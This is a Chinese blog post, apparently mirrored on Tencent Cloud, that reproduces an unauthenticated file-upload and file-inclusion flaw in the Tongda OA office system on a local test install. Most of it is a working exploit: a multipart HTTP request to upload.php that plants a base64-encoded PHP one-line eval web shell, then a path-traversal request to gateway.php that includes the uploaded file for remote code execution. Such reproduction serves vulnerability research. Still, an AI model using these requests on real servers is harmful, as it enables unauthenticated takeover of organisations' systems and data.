前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >通达OA文件上传文件包含漏洞解析

通达OA文件上传文件包含漏洞解析

作者头像
逍遥子大表哥
发布2021-12-18 14:09:17
2.1K0
发布2021-12-18 14:09:17
举报
文章被收录于专栏:kali blog

通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。

攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。

搭建本地环境

通达OA下载:

链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg

提取码:ousi

包含漏洞的两个文件:

文件上传:webroot\ispirit\im\upload.php

文件包含:webroot\ispirit\interface\gateway.php

漏洞复现

在没有登录的情况下上传文件

我们直接访问

http://localhost//ispirit/im/upload.php

提示:-ERR 用户未登陆

ok,我们在burp中构造数据包

代码语言:javascript
复制
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.174.159:80
Content-Length: 602
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="P"


------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$fp = fopen('bbskali.php', 'w');
$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundaryBwVAwV3O4sifyhr3--

这里我构造了一个名为bbskali.php的图片一句话木马。但是上传之后格式为jpg格式。

如上图,我们成功上传图片。位置为2005/339702047.jpg

通达OA默认上传位置:myoa/attach/im则上面的完整路劲为:myoa/attach/im/2005/339702047.jpg

通过文件包含解析出一句话

代码语言:javascript
复制
POST /ispirit/interface/gateway.php HTTP/1.1

Host: 192.168.123.209

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

json={"url":"/general/../../attach/im/2005/339702047.jpg"}

解析为php一句话

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1921368

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 搭建本地环境
  • 漏洞复现
  • 通过文件包含解析出一句话
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档